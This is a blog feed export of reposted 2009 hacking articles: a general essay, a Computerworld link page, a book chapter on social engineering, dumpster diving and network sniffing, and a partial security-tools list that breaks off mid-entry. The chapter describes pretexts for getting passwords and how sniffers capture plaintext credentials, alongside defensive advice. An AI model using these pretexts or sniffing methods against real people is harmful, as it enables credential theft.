tag:blogger.com,1999:blog-5319747199720117922024-03-13T22:40:48.121-07:00Hacking The Most Wanted........Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.comBlogger82125tag:blogger.com,1999:blog-531974719972011792.post-43832785860068143322009-08-29T00:54:00.000-07:002009-08-29T00:55:55.689-07:00Computer Hacking?<p><span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">Computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> is most common among teenagers and young adults, although there are many older hackers as well. Many hackers are true technology buffs who enjoy learning more about how computers work and consider <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> an “art” form. They often enjoy programming and have expert-level skills in one particular program. For these individuals, <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> is a real life application of their problem-solving skills. It’s a chance to demonstrate their abilities, not an opportunity to harm others. </p> <p>Since a large number of hackers are self-taught prodigies, some <a href="http://www.wisegeek.com/what-is-a-corporation.htm">corporations</a> actually employ <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> hackers as part of their technical support staff. These individuals use their skills to find flaws in the company’s security system so that they can be repaired quickly. In many cases, this type of <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> helps prevent <a href="http://www.wisegeek.com/what-is-identity-theft.htm">identity theft</a> and other serious <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span>-related crimes.</p> <p><span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">Computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> can also lead to other constructive technological developments, since many of the skills developed from <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> apply to more mainstream pursuits. For example, former hackers Dennis Ritchie and Ken Thompson went on to create the UNIX <a href="http://www.wisegeek.com/what-is-an-operating-system.htm">operating system</a> in the 1970s. This system had a huge impact on the development of <a href="http://www.wisegeek.com/what-is-linux.htm">Linux</a>, a free UNIX-like operating system. Shawn Fanning, the creator of Napster, is another <a href="http://www.wisegeek.com/what-is-a-hacker.htm">hacker</a> well known for his accomplishments outside of <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span>.</p> <p>In comparison to those who develop an interest in <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> out of simple intellectual curiosity, some hackers have less noble motives. Hackers who are out to steal personal information, change a <a href="http://www.wisegeek.com/what-is-a-corporation.htm">corporation</a>’s financial data, break security codes to gain unauthorized network access, or conduct other destructive activities are sometimes called “crackers.” This type of <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">hacking</span></span></span> can earn you a trip to a federal prison for up to 20 years.</p> <p>If you are interested in protecting your home <span class="yellowFade"><span><span style="position: relative;" class="yellowFadeInnerSpan">computer</span></span></span> against malicious hackers, investing in a good firewall is highly recommended. It’s also a good idea to check your software programs for updates on a regular basis. For example, Microsoft offers a number of free security patches for its Internet Explorer browser.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-72291150476028401532009-08-29T00:52:00.001-07:002009-08-29T00:52:48.440-07:00Diskeeper claims victory over disk fragmentation<img src="http://computerworldcom.112.2o7.net/b/ss/computerworldcom/1/G.7-PD-R/s2179611480792?%5BAQB%5D&ndh=1&t=29/7/2009%2013%3A21%3A28%206%20-330&pageName=Topic%3AOperating%20Systems%3AOperating%20Systems&g=http%3A//www.computerworld.com/s/topic/89/Operating%2BSystems&r=http%3A//www.computerworld.com/s/article/91313/Wireless_Hacking_Techniques&ch=Operating%20Systems&events=event1&cc=USD&v1=Topic%3AOperating%20Systems%3AOperating%20Systems&c2=Operating%20Systems%3A&v2=Topic&c14=Topic&pid=Content%3A91313%3AWireless%20Hacking%20Techniques&pidt=1&oid=http%3A//www.computerworld.com/s/topic/89/Operating%2BSystems&ot=A&s=1024x768&c=32&j=1.3&v=Y&k=Y&bw=999&bh=541&p=Java%20Deployment%20Toolkit%206.0.150.3%3BMozilla%20Default%20Plug-in%3BAdobe%20Acrobat%3BShockwave%20Flash%3BPicasa%3BYahoo%20Application%20State%20Plugin%3BWindows%20Presentation%20Foundation%3BGoogle%20Updater%3BGoogle%20Update%3BVLC%20Multimedia%20Plug-in%3BJava%28TM%29%20Platform%20SE%206%20U15%3B&%5BAQE%5D" name="s_i_computerworldcom" alt="" width="1" border="0" height="1" /> <!-- End SiteCatalyst code version: G.7. --> <!-- GOOGLE ANALYTICS CODE --> <script src="http://www.computerworld.com/common/javascript/urchin.js" type="text/javascript"></script> <script type="text/javascript"> _uacct = "UA-300704-1"; urchinTracker(); </script> <script src="http://www.computerworld.com/resources/scripts/lib/leadgen_tracking.js" type="text/javascript"></script> <!-- BEGIN TOP STORIES --><br /><p> Diskeeper said it has developed a software that prevents up to 85% of disk fragmentation, which should lead to a significant increase in computer system performance. <a href="http://www.computerworld.com/s/article/9137227/Diskeeper_claims_victory_over_disk_fragmentation?taxonomyId=89"> <b> Read more...</b> </a> </p> <p> <a href="http://www.computerworld.com/s/article/9137223/Snow_Leopard_doesn_t_sync_with_Palm_OS_devices_?taxonomyId=89" class="title14blue">Snow Leopard doesn't sync with Palm OS devices </a> </p> <p> <a href="http://www.computerworld.com/s/article/9137222/Apple_launches_Snow_Leopard_posts_support_docs?taxonomyId=89" class="title14blue">Apple launches Snow Leopard, posts support docs</a> </p> <p> <a href="http://www.computerworld.com/s/article/9137205/Windows_7_Family_Pack_available_for_pre_order_early_online?taxonomyId=89" class="title14blue">Windows 7 Family Pack available for pre-order early online</a> </p> <p> <a href="http://www.computerworld.com/s/article/9137200/Reports_29_Snow_Leopard_upgrade_works_on_Tiger_too?taxonomyId=89" class="title14blue">Reports: $29 Snow Leopard upgrade works on Tiger, too</a> </p> <p> <a href="http://www.computerworld.com/s/article/9137207/Analysts_Windows_7_could_spur_enterprise_PC_sales?taxonomyId=89" class="title14blue">Analysts: Windows 7 could spur enterprise PC sales</a> </p> <p> <a href="http://www.computerworld.com/s/article/9137191/Angry_Adobe_users_rant_about_Snow_Leopard_support?taxonomyId=89" class="title14blue">Angry Adobe users rant about Snow Leopard support</a> </p> <p> <a href="http://www.computerworld.com/s/article/9137176/Apple_adds_basic_anti_malware_to_Snow_Leopard?taxonomyId=89" class="title14blue">Apple adds basic anti-malware to Snow Leopard</a> </p> <p> <a href="http://www.computerworld.com/s/article/9137119/Free_software_group_attacks_Windows_7_sins_?taxonomyId=89" class="title14blue">Free software group attacks Windows 7 'sins'</a> </p> <p> <a href="http://www.computerworld.com/s/article/9137101/Microsoft_expands_Office_antipiracy_nagging_to_U.S._users?taxonomyId=89" class="title14blue">Microsoft expands Office antipiracy 'nagging' to U.S. users</a> </p> <p><a href="http://www.computerworld.com/s/topic/89/Operating+Systems/1">More Operating Systems Stories<img src="http://www.computerworld.com/common/images/common/arrow_blue_right.gif" alt="More Top Stories" border="0" /></a></p> <!-- END TOP STORIES --> <!-- BEGIN FEATURES --> <h2 class="sidebar-heading"> <br /> </h2> <p> <a href="http://www.computerworld.com/s/article/9137229/What_s_the_real_deal_with_64_bit_computing_in_Snow_Leopard_?taxonomyId=89"><b>What's the real deal with 64-bit computing in Snow Leopard?</b></a><br />Apple touts Snow Leopard's 64-bit capabilities as a selling point for the operating system, but bloggers are claiming it's not a true 64-bit OS. Columnist Ryan Faas cuts through the confusion.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137224/Mac_OS_X_Snow_Leopard_Perfection_refined?taxonomyId=89"><b>Mac OS X Snow Leopard: Perfection, refined</b></a><br />New releases of Apple's Mac OS X operating system are highly anticipated because each one upgrades the Mac platform in the best way. That is, for Mac users, a new Mac OS X release is always like getting a new computer. Apple generally brags of hundreds of new features folded into each release, and post-upgrade exploration is an enjoyable exercise that marks cultural and design differences between the Mac and the PC.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137033/Snow_Leopard_Which_apps_utilities_have_been_left_behind_?taxonomyId=89"><b>Snow Leopard: Which apps, utilities have been left behind?</b></a><br />Like any new OS, Apple's Snow Leopard has left a few applications behind. We look at some of those that don't yet work, and offer a few alternatives.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137192/Services_step_out_in_Snow_Leopard?taxonomyId=89"><b>Services step out in Snow Leopard</b></a><br />The Services menu in OS X has always been promising. In theory, it's a convenient way to perform common operations on files or text. For instance, you can select a file in the Finder, then navigate to Finder -> Services -> Mail -> Send File, and the file will be attached to a new e-mail message, just waiting for an address and delivery. Or select a chunk of text on a Web site in Safari, then choose Safari -> Services -> Make New Sticky Note, to create a new note containing that selected text.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137181/Gauging_Snow_Leopard_s_speed_gains?taxonomyId=89"><b>Gauging Snow Leopard's speed gains</b></a><br />Apple describes Snow Leopard as a top-to-bottom refinement of existing features. One major goal of those refinements: Improved performance.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137180/11_major_new_Snow_Leopard_features?taxonomyId=89"><b>11 major new Snow Leopard features</b></a><br />Snow Leopard may be a "minor" update to Mac OS X, but it's got plenty of big new features. Here's an inside look.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137175/Snow_Leopard_The_in_depth_review?taxonomyId=89"><b>Snow Leopard: The in-depth review</b></a><br />Apple has spent the last decade building and improving Mac OS X, fusing the classic Mac OS and technology acquired from Steve Jobs's Next into an impressive mainstream operating system that's widely considered the best in its class. But after a decade of constant advancement and regular operating-system upgrades, Apple has taken a pause with the release of Snow Leopard, also known as Mac OS X 10.6. Instead of adding hundreds of new features, Apple has chosen to use Snow Leopard to cut ties with the past, plan for the future, and take dead aim on its present competition.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137147/Upgrading_to_Apple_s_Snow_Leopard_OS_What_you_need_to_know?taxonomyId=89"><b>Upgrading to Apple's Snow Leopard OS: What you need to know</b></a><br />With its new Snow Leopard operating system, Apple has made the Mac OS X upgrade process as painless as possible. We walk you through the steps.<br /><br /> </p> <p> <a href="http://www.computerworld.com/s/article/9137110/Review_Apple_s_Snow_Leopard_opens_door_to_a_fab_future?taxonomyId=89"><b>Review: Apple's Snow Leopard opens door to a fab future</b></a><br />Mac OS X Snow Leopard offers a slew of hidden advances including increased speed and efficiency; plus the combination of OpenCL, 64-bit mode and Grand Central Dispatch lays the groundwork for big advances to come. At $29, it's a steal.<br /><br /> </p> <a href="http://www.computerworld.com/s/article/9137174/Opinion_What_s_wrong_with_Mac_OS_X_Snow_Leopard?taxonomyId=89"><b>Opinion: What's wrong with Mac OS X Snow Leopard</b></a><br />Snow Leopard's not-quite-enterprise-class support for Exchange 2007 and Cisco's VPN protocol are chief among the disappointments for businesses.Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-42698898866913735482009-08-29T00:49:00.000-07:002009-08-29T00:51:19.823-07:00Wireless Hacking TechniquesA typical hacker attack is not a simple, one-step procedure. It is rare that a hacker can get online or dial up on a remote computer and use only one method to gain full access. It is more likely that the attacker will need several techniques used in combination to bypass the many layers of protection standing between them and root administrative access. Therefore, as a security consultant or network administrator, you should be well versed in these occult techniques in order to thwart them. This chapter, which will be a review for advanced users, will introduce the main types of hacker attacks. Expert users will want to skip ahead to the next chapter (Chapter 7, "Wireless Attacks") and go straight for the goodies.<br /><br />The following techniques are not specific to wireless networks. Each of these attacks can take multiple forms, and many can be targeted against both wired and wireless networks. When viewed holistically, your wireless network is just another potential hole for a hacker. Therefore, this chapter will review hacking techniques from a generic perspective.<br /><!--beginpage2--><br /><a name="two"><b>Diverse Hacker Attack Methods</b></a><br /><br />The stereotyped image conjured up by most people when they hear the term "hacker" is that of a pallid, atrophied recluse cloistered in a dank bedroom, whose spotted complexion is revealed only by the unearthly glare of a Linux box used for port scanning with Perl. This mirage might be set off by other imagined features, such as dusty stacks of Dungeons and Dragons lore from the 1980s, empty Jolt Cola cans, and Japanese techno music streaming from the Net.<br /><br />However, although computer skill is central to a hacker's profession, there are many additional facets that he must master. In fact, if all you can do is point and click, you are a script kiddie, not a hacker. A real hacker must also rely on physical and interpersonal skills such as social engineering and other "wet work" that involves human interaction. However, because most people have a false stereotype of hackers, they fail to realize that the person they are chatting with or talking to on the phone might in fact be a hacker in disguise. In fact, this common misunderstanding is one of the hackers' greatest assets.<br /><br /><a name="three"><b>Social Engineering</b></a><br /><br />Social engineering is not unique to hacking. In fact, many people use this type of trickery every day, both criminally and professionally. Whether it be haggling for a lower price on a lawn mower at a garage sale, or convincing your spouse you really need that new toy or outfit, you are manipulating the "target." Although your motives might be benign, you are guilty of socially engineering the other party.<br /><br /><a name="four"><b>The Virtual Probe</b></a><br /><br />One example of social engineering that information technology managers face on a weekly basis is solicitation from vendors. An inimical form of sales takes the form of thinly disguised telemarketing. Straying far from ethical standards of sales technique, such vendors will attempt to trick you into giving them information so they can put your company's name on a mailing list.<br />Here is one such attempt that we get regularly:<br />"Hi, this is the copier repair company. We need to get the model of your copier for our service records. Can you get that for us?"<br /><br />Now, this sounds innocent enough, and there are probably many that fall for this tactic. However, they are simply trying to trick you into providing sensitive information-information that they really have no business knowing.<br /><br />Like the scam artist, a hacker often uses similar techniques. A popular method that hackers use is pretending to be a survey company. A hacker can call and ask all kinds of questions about the network operating systems, intrusion detection systems (IDSs), firewalls, and more in the guise of a researcher. If the hacker was really malicious, she could even offer a cash reward for the time it took for the network administrator to answer the questions. Unfortunately, most people fall for the bait and reveal sensitive network information.<br /><!--beginpage3--><br /><a name="five"><b>Lost Password</b></a><br /><br />One of the most common goals of a hacker is to obtain a valid user account and password. In fact, sometimes this is the only way a hacker can bypass security measures. If a company uses firewalls, intrusion detection systems, and more, a hacker will need to borrow a real account until he can obtain root access and set up a new account for himself. However, how can a hacker get this information? One of the easiest ways is to trick someone into giving it to them.<br /><br />For example, many organizations use a virtual private network (VPN) that enables remote employees to connect to the network from home and essentially become a part of the local network. This is a very popular method of enabling people to work from home, but is also a potential weak spot in any security perimeter. As VPNs are set up and maintained by the IT department, hackers will often impersonate an actual employee and ask one of the IT staff for the password by pretending to have lost the settings. If the IT employee believes the person, he willingly and often gladly hands over the keys. Voila! The hacker now can connect from anywhere on the Internet and use an authorized account to work his way deeper into the network. Imagine if you were the lowly IT staff person on call and the CEO rang you up at 10:30 p.m. irate about a lost password. Would you want to deny her access, risking the loss of your job? Probably not, which makes this type of fear a hacker's best friend.<br /><br /><a name="six"><b>Chatty Technicians</b></a><br /><br />If you are a home user and think you have nothing to fear from this type of impersonation, think again-you are actually targeted more often by scammers and hackers alike. This is because many Internet newcomers (newbies) will believe anything someone appearing to be their ISP's tech support personnel tells them. For example, hackers will often send out mass messages to people, or sit in chat rooms and wait for a newbie to come along. They will then set up a fake account or use simple tricks to make it appear as if an AOL employee is chatting with them. What the newbies do not realize is that they are actually talking with a hacker in disguise. So, they willingly hand over everything from credit cards to user names and passwords. See Figure 1 for an example of how a fake request might appear.<br /><br /><img src="http://www.computerworld.com/computerworld/records/images/chart/06fig01.gif" width="350" border="0" height="281" /><br /><b>Figure 1</b><br /><br />As you can see, to a beginner it appears that an AOL Administrator is on the other side of this conversation. However, if you look closely, you will see a blank like after Hckr-name:. To make it appear as though an AOL System Administrator is talking, we added a line of space characters to the beginning of the text to drop the AOL System Administrator: to the next line. Although the original name does appear, it would not be difficult for a hacker to set up an account using a date or company name to disguise the fact the account was simply another username.<br /><br /><a name="seven"><b>Social Spying</b></a><br /><br />Social spying is the process of "using observation to acquire information." Although social engineering can provide a hacker with crucial information, small businesses are better protected against social engineering because many people in very small companies know each other. For example, if one of the IT staff received a call from a hacker pretending to be a distressed CEO, he would probably recognize the voice as not belonging to the real CEO. In this case, social spying becomes more important.<br /><br />To illustrate one of the nontechnical ways social spying can be used, consider how many people handle ATM cards. For example, do you hide your PIN when you take money out at the ATM? Take note of how people protect their PIN the next time you are in line at the ATM. You will probably note most people do not care. Most will whip out their card and punch the numbers without a care for who could be watching. If the wrong person memorized the PIN, he would have all the information needed to access the funds in the account, provided he could first get his hands on the ATM card. Thus, a purse-snatcher would not only get the money just withdrawn from an ATM, but could easily go back and withdraw the entire day's limit.<br /><br />Similarly, hackers socially spy on users as they enter passwords. A "flower delivery" at 8:00 a.m. in the morning would give a hacker the necessary excuse to casually stroll through an office building. Although she appears to be looking for the recipient of the flowers, she could be watching for people entering passwords or other sensitive information.<br /><br />In addition to snooping on people as they actively type their user information, most offices have at least several people who are guilty of posting their password on or near their computer monitor. This type of blatant disregard for security is every network administrator's worst nightmare. Regardless of repeated memos, personal visits, and warnings, some people seem to always find an excuse to post their network password right in plain view. Even if some people are at least security-conscious enough to hide their Post-it notes in a discreet place, it still only takes a few seconds to lift up a keyboard or pull open a desk drawer.<br /><br />If you do not believe this, take a quick walk around and see just how many potential security violations are in your office area. You might be very surprised to see just what type of information is there for the taking!<br /><!--beginpage4--><br /><a name="eight"><b>Garbage Collecting</b></a><br /><br />Have you ever thrown away a credit card statement without shredding it? If so, you are a potential target. Although you might consider your trash to be sacred territory that no one enters because it is dirty, your trash, and the trash of your company, is often a gold mine. Fishing through garbage to find passwords, also known as dumpster diving, can provide a hacker with the crucial information needed to take over your network.<br /><br />Let's consider a scenario. If you are a network administrator and you receive an anonymous tip that people are posting passwords all around the office, what would you do? Most administrators would immediately investigate and send out a memo to everyone in the company stating that this activity is not allowed, and that violations will be dealt with harshly. Although this might get everyone to temporarily take down their Post-it passwords, the problem has only been exacerbated, for all those passwords are now headed right to the anonymous caller who is waiting at the dumpster.<br /><br />In addition to passwords, hackers can find memos, sensitive reports, diskettes, old hard drives, and more in the trash. Imagine the value an old cash register hard drive could have to a hacker looking for a way to gain access to a company's credit card database. In many cases, a hard drive can simply be installed on another computer and searched using inexpensive (or free) forensics tools.<br /><br /><a name="nine"><b>Sniffing</b></a><br /><br />A sniffer is a program and/or device that monitors all information passing through a computer network. It sniffs the data passing through the network off the wire and determines where the data is going, where it's coming from, and what it is. In addition to these basic functions, sniffers might have extra features that enable them to filter a certain type of data, capture passwords, and more. Some sniffers (for example, the FBI's controversial mass-monitoring tool Carnivore) can even rebuild files sent across a network, such as an email or Web page.<br /><br />A sniffer is one of the most important information gathering tools in a hacker's arsenal. The sniffer gives the hacker a complete picture (network topology, IP addresses) of the data sent and received by the computer or network it is monitoring. This data includes, but is not limited to, all email messages, passwords, user names, and documents. With this information, a hacker can form a complete picture of the data traveling on a network, as well as capture important tidbits of data that can help her gain complete control over a network.<br /><br /><a name="ten"><b>How Does a Sniffer Work?</b></a><br /><br />For a computer to have the capability to sniff a network, it must have a network card running in a special mode. This is called promiscuous mode, which means it can receive all the traffic sent across the network. A network card will normally only accept information that has been sent to its specific network address. This network address is properly known as the Media Access Control (MAC) address. You can find your own MAC address by going to the Windows Taskbar and clicking Start?Run and typing winipcfg (for Windows 95/98/ME) or ipconfig /all (for Windows NT/2000/.NET Server). The MAC address is also called the physical address.<br /><br />The only exception to this is what is called monitor mode. This type of network card status only applies to wireless network interface cards (NICs). Because of the unique properties of a wireless network, any data traveling through the airwaves is open to any device that is configured to listen. Although a card in promiscuous mode will work in wireless environments, there is no need for it to actually be part of the network. Instead, a WNIC can simply enter a listening status in which it is restricted from sending data out to the network. As you will learn later, a network card in promiscuous mode can be detected because of how it interacts with the network. Monitor mode stops all interaction.<br /><br />There are different layers involved in network communications. Normally, the Network layer is responsible for searching the packets of information for their destination address. This destination address is the MAC address of a computer. There is a unique MAC address for every network card in the world. Although you can change the address, the MAC address ensures that the data is delivered to the right computer. If a computer's address does not match the address in the packet, the data is normally ignored.<br /><br />The reason a network card has this option to run in promiscuous mode is for troubleshooting purposes. Normally, a computer does not want or need information to be sent to other computers on the network. However, in the event that something goes wrong with the network wiring or hardware, it is important for a network technician to look inside the data traveling on the network to see what is causing the problem. For example, one common indication of a bad network card is when computers start to have a difficult time transferring data. This could be the result of information overload on the network wires. The flood of data would jam the network and stop any productive communication. After a technician plugs in a computer with the capability to examine the network, he would quickly pinpoint the origin of the corrupt data, and thus the location of the broken network card. He could then simply replace the bad card and everything would be back to normal.<br /><br />Another way to visualize a sniffer is to consider two different personality types at a cocktail party. One type is the person who listens and replies to conversations in which he is actively involved. This is how a network card is supposed to work on your local machine. It is supposed to listen and reply to information sent directly to it.<br /><br />On the other hand, there are those people at the party who stand quietly and listen to everyone's conversation. This person could be compared to a network card running in promiscuous mode. Furthermore, if this eavesdropper listened for a specific subject only, she could be compared to a sniffer that captures all data related to passwords only.<br /><br /><a name="eleven"><b>How Hackers Use Sniffers</b></a><br /><br />Figure 2 shows a sniffer in action. As previously mentioned, sniffers like this are used every day to troubleshoot faulty equipment and monitor network traffic. Hackers can use this or similar tools to peer inside a network. However, they are not out to troubleshoot. Instead, they are out to glean passwords and other gems.<br /><br /><img src="http://www.computerworld.com/computerworld/records/images/chart/06fig03.gif" width="450" border="0" height="311" /><br /><b>Figure 2</b><br /><br />Depending on the program a hacker is using, he will get something that looks like Figure 2. As you can see from the figure, some data is easily readable, while some data is not. The difference is in the type of data that is sent. Computers can send information either in plain text or in an encrypted form. The sample capture shows just how easy it is to read captured plaintext data.<br /><br />Plaintext communication is any information that is sent just as it appears to the human eye. For most applications, this is the standard means of data transfer. For example, the Internet uses plaintext for most of its communications. This is the fastest way to send data. Chat programs, email, Web pages and a multitude of other programs send their information in plaintext. This is acceptable for most situations; however, it becomes a problem when transmitting sensitive information, such as a bank account number or a password.<br /><br />For example, take our sniffer screenshot in Figure 2. If you look closely at the plaintext section, you can see just how dangerous a sniffer can be to sensitive information. In the plaintext, you can see the following: Our company will be merging with another company. This will make our stock $$. Don't tell anyone. If this were a real merger, a hacker could make millions overnight.<br /><br />In addition, email clients and FTP clients do not normally encrypt their passwords; this makes them two of the most commonly sniffed programs on a network. Other commonly used programs such as Telnet, Web browsers, and news programs also send their passwords as plaintext. So, if a hacker successfully installs a sniffer on your network, he would soon have a list of passwords and user names that he could exploit.<br /><br />Even some encrypted passwords used in a Windows NT network can be sniffed. Thanks to the rather well-known encryption scheme of an NT password, it does not take long to capture and decrypt more than enough NT passwords to break a network wide open. In fact, there are even sniffing programs that have an NT password cracker built right into them. The programs are designed to be very user friendly so that network administrators can test their networks for weak passwords. Unfortunately, these programs often end up in the hands of script kiddies who can just as easily use them to cause problems.<br /><br />Although sniffers most commonly show up within closed business networks, they can also be used throughout the Internet. As mentioned previously, the FBI has a program that will capture all the information both coming from and going to computers online. This tool, previously known as Carnivore, simply has to be plugged in and turned on. Although it is purported to filter out any information that is not the target's, this tool actually captures everything traveling through whatever wire to which it is connected and then filters it according to the rules set up in the program. Thus, Carnivore can potentially capture all of those passwords, email messages, and chat sessions passing through its connection.<br /><br />In addition to wired networks, sniffers can also be used in wireless networks. In effect, a wireless network on a corporate LAN is like putting an Ethernet jack in your parking lot. What makes this unique from a hacker's perspective is that sniffing a wireless network is probably not illegal, although it has yet to be tested in court. In many ways, it is no different than a police scanner used by reporters and hobbyists worldwide. If the information is sent in plaintext to the public domain, how can it be wrong to simply listen?<br /><br /><a name="twelve"><b>How to Detect a Sniffer</b></a><br /><br />There are a few ways a network technician can detect a NIC running in promiscuous mode. One way is to physically check all the local computers for any sniffer devices or programs. There are also software detection programs that can scan networks for devices that are running sniffer programs (for example, AntiSniff). These scanner programs use different aspects of the Domain Name Service and TCP/IP components of a network system to detect any malicious programs or devices that are capturing packets (running in promiscuous mode). However, for the average home user, there is really no way to detect whether a computer out on the Internet is sniffing your information. This is why encryption is strongly recommended.<br /><br /><a name="thirteen"><b>How Can I Block Sniffers?</b></a><br /><br />There is really only one way to protect your information from being sniffed: Use encryption! Using Secure Sockets Layer (SSL)-protected Web sites and other protection tools, you can encrypt your passwords, email messages and chat sessions. There are many programs available for free that are easy to use. Although you do not always need to protect the information passed during a chat session with your friends, you should at least have the option available when needed.<br /><br />Because of the very nature of a WLAN, encryption is a must in any situation. Fortunately, wireless networks come with the option of encryption built right into their software. However, few take advantage of this capability, as few are even aware that this option exists.Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-24727436172815087682009-07-29T05:26:00.002-07:002009-07-29T05:27:16.445-07:00Top 100 Network Security Tools 76-100<table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#76</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://portswigger.net/suite/">Burpsuite</a> : An integrated platform for attacking web applications<br />Burp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="brutus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#77</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">32</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.hoobie.net/brutus/">Brutus</a> : A network brute-force authentication cracker<br />This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at <a href="http://sectools.org/index.html#hydra">THC Hydra</a>. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="unicornscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#78</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.unicornscan.org/"><img src="http://mirror.sectools.org/logos/unicornscan-71x66.png" align="right" border="0" width="71" height="66" /></a> <a href="http://www.unicornscan.org/">Unicornscan</a> : Not your mother's port scanner<br />Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses. Like <a href="http://sectools.org/tools4.html#scanrand">Scanrand</a>, it isn't for the faint of heart. <p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="stunnel"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#79</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">33</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.stunnel.org/"><img src="http://mirror.sectools.org/logos/stunnel-32x32.png" align="right" border="0" width="32" height="32" /></a> <a href="http://www.stunnel.org/">Stunnel</a> : A general-purpose SSL cryptographic wrapper<br />The stunnel program is designed to work as an SSL encryption wrapper between remote client and 